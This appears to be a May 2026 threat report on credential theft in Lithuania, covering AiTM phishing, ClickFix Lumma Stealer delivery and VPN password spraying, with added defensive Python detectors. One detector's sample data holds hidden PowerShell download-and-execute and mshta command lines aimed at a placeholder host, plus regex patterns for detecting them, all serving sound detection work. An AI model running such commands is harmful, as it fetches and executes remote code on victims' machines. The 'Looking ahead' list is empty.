
May 2026 was clearly dominated by identity and credential theft. Phishing campaigns were, as is most often the case, aimed at Microsoft 365 and other email accounts, while the most advanced ones bypassed two-factor authentication in real time (AiTM). Six out of ten events we logged in May were tied specifically to credential harvesting or session hijacking. That same month, Lithuania was shaken by a large-scale leak from state registers, which likewise appear to have been breached using legitimate login credentials seized by threat actors. This illustrates the month’s key message best: today attackers do not “break down the door” – they log in with someone else’s keys.
Phishing and AiTM: MFA alone is no longer enough
Most of May’s events were phishing emails leading to credential-harvesting pages, most often imitating the Microsoft 365 sign-in. Several campaigns used the AiTM (adversary-in-the-middle) technique: once the victim signs in, the attacker proxies the communication in real time and steals the session token, thereby bypassing even enabled MFA.
We also observed brand impersonation: we recorded attempts to impersonate an internet service provider in order to deliver fake invoices and defraud victims, as well as an imitation of a bank’s login page hosted on a compromised foreign domain and targeting Lithuanian users. Attackers increasingly hide behind legitimate cloud services (e.g., Cloudflare Workers) and redirect chains, which makes such emails harder to filter. The trend is not local: over the past year AiTM attacks have grown by roughly 146% worldwide, and in March Europol took down the major phishing-as-a-service platform Tycoon 2FA. The conclusion is simple – MFA is essential, but it is not enough: phishing-resistant MFA must be deployed, and session token usage anomalies that may indicate token theft must be monitored.
ClickFix – “Lumma Stealer”
ClickFix attacks, which dominated in previous months, remained active in May. The victim is shown a fake CAPTCHA or “error” page urging them to “verify” or “fix” access by pasting a command into the Windows Run dialog. This launches a PowerShell command that loads the Lumma Stealer infostealer directly into memory, leaving no files on disk. In May we recorded two such ClickFix Lumma cases. Because the malicious code runs in memory, signature-based defenses struggle to detect it – behavioral analysis is essential.
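The paragraph above says that fileless ClickFix chains defeat signature matching and need behavioral detection. As an added example (not code from the original post or from any vendor), the following Python scores process-creation events on the behavioral signals a ClickFix launch leaves behind: a script host started by explorer.exe (the Run dialog), a hidden window, an execution-policy bypass, an encoded command, or an in-memory download-and-execute. The event field names and the sample events are constructed assumptions loosely modelled on Sysmon-style process telemetry, not a real schema or real captures; example.invalid is a placeholder host.

```python
import re
from typing import List

# Constructed sample process-creation events (not real telemetry). Field names
# are an assumption loosely modelled on Sysmon Event ID 1, not an exact schema.
PROCESS_EVENTS = [
    # Admin running a script from a console: launched by cmd.exe, no other signals.
    {"host": "ws-01", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    # ClickFix shape: shell from the Run dialog, hidden window, policy bypass,
    # download-and-execute entirely in memory (placeholder URL).
    {"host": "ws-02", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"iex (irm http://example.invalid/x)\""},
    # Encoded command from the Run dialog: flagged on the switches alone.
    {"host": "ws-03", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc AAAA"},
    # A script host pointed at a remote URL from the Run dialog.
    {"host": "ws-04", "parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/y"},
    # PowerShell opened from a desktop shortcut: parent signal only, not flagged.
    {"host": "ws-05", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}
REMOTE_SCRIPT_HOSTS = {"mshta.exe", "rundll32.exe", "regsvr32.exe",
                       "wscript.exe", "cscript.exe"}

# Each regex is matched against the lower-cased command line.
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden")
BYPASS_RE = re.compile(r"-(?:ep|executionpolicy)\s+bypass")
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\b")
IEX_RE = re.compile(r"\biex\b|invoke-expression")
DOWNLOAD_RE = re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|"
                         r"downloadstring|downloadfile)\b|https?://")
URL_RE = re.compile(r"https?://")


def clickfix_signals(event: dict) -> List[str]:
    """Return the behavioral signals present in one process-creation event."""
    image = event["image"].lower()
    parent = event["parent"].lower()
    cmd = event["cmdline"].lower()
    signals = []
    if parent == "explorer.exe" and image in SCRIPT_HOSTS:
        signals.append("run_dialog_launch")
    if HIDDEN_RE.search(cmd):
        signals.append("hidden_window")
    if BYPASS_RE.search(cmd):
        signals.append("policy_bypass")
    if ENCODED_RE.search(cmd):
        signals.append("encoded_command")
    if IEX_RE.search(cmd) and DOWNLOAD_RE.search(cmd):
        signals.append("in_memory_download")
    if image in REMOTE_SCRIPT_HOSTS and URL_RE.search(cmd):
        signals.append("remote_script_host")
    return signals


def detect_clickfix(events: List[dict]) -> List[dict]:
    """Flag an event when it was launched from explorer.exe and shows at least one
    further signal, or shows two or more command-line signals on its own."""
    findings = []
    for ev in events:
        sig = clickfix_signals(ev)
        others = [s for s in sig if s != "run_dialog_launch"]
        if ("run_dialog_launch" in sig and others) or len(others) >= 2:
            findings.append({"host": ev["host"], "image": ev["image"], "signals": sig})
    return findings


if __name__ == "__main__":
    for finding in detect_clickfix(PROCESS_EVENTS):
        print(finding)
```

The parent-process signal does the heavy lifting: a user pasting into the Run dialog always yields explorer.exe as the parent, which legitimate administrative scripting rarely does, so even a command line that hides its intent behind encoding still trips the rule. The thresholds are deliberately conservative; tune them against your own baseline of explorer.exe-launched script hosts before alerting on them.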
Targeted attacks against Lithuanian targets
Alongside mass phishing, we also saw targeted intrusion attempts. We recorded SSL/VPN login attempts using a list of Lithuanian usernames, which indicates that the attackers had gathered information about a specific organization in advance. We also observed automated scanning of publicly accessible systems and attempts to exploit vulnerabilities (e.g., SSRF), as well as malware distribution through forged installers and CDNs (e.g., a trojanized JDownloader, the DriverHub PUA). Different methods, but the common denominator is the same – initial access through a human or through an unprotected public-facing service.
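The VPN login attempts with a prepared list of usernames described above are the classic footprint of password spraying: one source trying many accounts a few times each, rather than one account many times. As an added example (not code from the original post or from any VPN vendor), the following Python reads constructed VPN authentication log lines, finds any source that failed against at least five distinct usernames inside a ten-minute window, and reports whether any account from that source succeeded in the same window. The log layout, the field names, the usernames and the addresses are all constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed VPN authentication log (not real data). The line layout is an
# assumption for this example, not any vendor's syslog format.
LOG_LINES = """\
2026-05-20T02:10:01 vpn-gw auth-fail src=203.0.113.50 user=jonas.p
2026-05-20T02:10:03 vpn-gw auth-fail src=203.0.113.50 user=ruta.k
2026-05-20T02:10:06 vpn-gw auth-fail src=203.0.113.50 user=tomas.v
2026-05-20T02:10:09 vpn-gw auth-fail src=203.0.113.50 user=egle.j
2026-05-20T02:10:12 vpn-gw auth-fail src=203.0.113.50 user=mantas.b
2026-05-20T02:10:15 vpn-gw auth-fail src=203.0.113.50 user=aiste.s
2026-05-20T02:10:18 vpn-gw auth-fail src=203.0.113.50 user=lukas.z
2026-05-20T02:11:30 vpn-gw auth-ok src=203.0.113.50 user=tomas.v
2026-05-20T09:00:00 vpn-gw auth-fail src=198.51.100.20 user=egle.j
2026-05-20T09:00:20 vpn-gw auth-fail src=198.51.100.20 user=egle.j
2026-05-20T09:00:40 vpn-gw auth-ok src=198.51.100.20 user=egle.j
"""

LINE_RE = re.compile(r"^(\S+) \S+ (auth-fail|auth-ok) src=(\S+) user=(\S+)$")
WINDOW = timedelta(minutes=10)
DISTINCT_USER_THRESHOLD = 5


def parse_log(text: str) -> List[dict]:
    """Parse log lines into events; lines that do not match the layout are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, outcome, src, user = m.groups()
        events.append({"ts": datetime.fromisoformat(ts), "outcome": outcome,
                       "src": src, "user": user})
    return events


def detect_spraying(events: List[dict]) -> List[dict]:
    """One finding per source that failed against >= threshold distinct users
    within WINDOW. The window with the most distinct users is reported, together
    with any accounts that logged in successfully from that source inside it."""
    by_src: Dict[str, List[dict]] = defaultdict(list)
    for ev in events:
        by_src[ev["src"]].append(ev)
    findings = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if e["outcome"] == "auth-fail"]
        best_count, best_start = 0, None
        for anchor in fails:  # slide a window starting at each failure
            end = anchor["ts"] + WINDOW
            users = {e["user"] for e in fails if anchor["ts"] <= e["ts"] <= end}
            if len(users) > best_count:
                best_count, best_start = len(users), anchor["ts"]
        if best_count < DISTINCT_USER_THRESHOLD:
            continue
        hits = sorted({e["user"] for e in evs if e["outcome"] == "auth-ok"
                       and best_start <= e["ts"] <= best_start + WINDOW})
        findings.append({"src": src, "distinct_users": best_count,
                         "window_start": best_start.isoformat(),
                         "successful_logins": hits})
    return findings


if __name__ == "__main__":
    for finding in detect_spraying(parse_log(LOG_LINES)):
        print(finding)
```

The second source in the sample (one user mistyping a password twice, then succeeding) stays below the threshold, which is the point of counting distinct usernames rather than raw failures. A successful login listed in a spraying finding is the account to reset and investigate first.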
Stolen legitimate credentials remain one of the principal intrusion vectors. MFA is essential, yet AiTM bypasses it, so phishing-resistant MFA, monitoring of session-token reuse, and detection of unusual logins are all needed.
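The AiTM section and the summary above both call for monitoring session-token reuse: after a proxied sign-in the stolen token is typically presented minutes later from the attacker's own infrastructure, with a different network origin and browser fingerprint. As an added example (not code from the original post or from any identity provider), the following Python correlates each session's issuing sign-in with later uses of the same session and flags a use that comes from a different ASN, or from a different IP and a different user agent, within an hour of issuance. The event field names, the session identifiers and the records are constructed assumptions loosely modelled on cloud sign-in logs, not a vendor's schema or real data.

```python
from datetime import datetime
from typing import Dict, List

# Constructed sign-in telemetry (not real logs). "signin" is the interactive
# sign-in that issued a session; "use" is a later request presenting the same
# session identifier. Field names are an assumption for this example.
EVENTS = [
    # Legitimate session: IP changes inside the corporate ASN, same browser.
    {"ts": "2026-05-12T08:01:10", "user": "a.jonaitis", "session": "s-1001",
     "kind": "signin", "ip": "10.20.0.5", "asn": "AS-CORP", "ua": "Edge/124 Windows"},
    {"ts": "2026-05-12T08:20:00", "user": "a.jonaitis", "session": "s-1001",
     "kind": "use", "ip": "10.20.0.9", "asn": "AS-CORP", "ua": "Edge/124 Windows"},
    # AiTM-style replay: minutes after issuance the same session is presented
    # from a hosting provider with a different browser fingerprint.
    {"ts": "2026-05-12T09:15:02", "user": "r.kazlauskiene", "session": "s-2002",
     "kind": "signin", "ip": "10.20.1.14", "asn": "AS-CORP", "ua": "Edge/124 Windows"},
    {"ts": "2026-05-12T09:17:45", "user": "r.kazlauskiene", "session": "s-2002",
     "kind": "use", "ip": "198.51.100.77", "asn": "AS-HOSTING", "ua": "Chrome/123 Linux"},
    # Use of a session whose issuing sign-in is missing from the data.
    {"ts": "2026-05-12T10:00:00", "user": "t.vaitkus", "session": "s-3003",
     "kind": "use", "ip": "203.0.113.8", "asn": "AS-HOSTING", "ua": "Chrome/123 Linux"},
]

REPLAY_WINDOW_MINUTES = 60


def _parse(ts: str) -> datetime:
    return datetime.fromisoformat(ts)


def find_token_anomalies(events: List[dict]) -> List[dict]:
    """Return one finding per suspicious session use.

    A use is a suspected replay when the session was issued to a different ASN,
    or to a different IP *and* a different user agent, and the use happens within
    REPLAY_WINDOW_MINUTES of issuance. A use with no issuing sign-in in the data
    is reported as a low-severity 'orphan_session' for follow-up.
    """
    issued: Dict[str, dict] = {}
    findings: List[dict] = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["kind"] == "signin":
            issued[ev["session"]] = ev
            continue
        origin = issued.get(ev["session"])
        if origin is None:
            findings.append({"session": ev["session"], "user": ev["user"],
                             "reason": "orphan_session", "severity": "low"})
            continue
        age_min = (_parse(ev["ts"]) - _parse(origin["ts"])).total_seconds() / 60
        mismatched = [k for k in ("ip", "asn", "ua") if ev[k] != origin[k]]
        replay = "asn" in mismatched or {"ip", "ua"} <= set(mismatched)
        if replay and age_min <= REPLAY_WINDOW_MINUTES:
            findings.append({"session": ev["session"], "user": ev["user"],
                             "reason": "session_replay_suspected",
                             "mismatched": mismatched,
                             "minutes_after_issue": round(age_min, 1),
                             "severity": "high"})
    return findings


if __name__ == "__main__":
    for finding in find_token_anomalies(EVENTS):
        print(finding)
```

An IP change alone is deliberately not enough, since mobile users and split-tunnel VPNs change addresses constantly; the ASN and user-agent comparison is what separates a roaming user from a token presented by a proxy host. The natural response to a high-severity finding is to revoke the session and require a fresh phishing-resistant sign-in rather than another password.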
Phishing emails increasingly arrive from legitimate but compromised mailboxes or trusted domains and hide behind cloud services that traditional email filters do not flag. ClickFix and infostealer-type malware run in memory, fileless, so signature-based defenses do not catch them – behavioral and contextual analysis, together with continuous user training, are required.
Looking ahead
Organizations should focus on:
Sources
https://www.nksc.lt/naujienos/nacionaline_kibernetinio_saugumo_bukles_ataskaita_.html
https://www.elastic.co/security-labs/tycoon-2fa-aitm-detection-engineering
https://thehackernews.com/2026/05/microsoft-details-phishing-campaign.html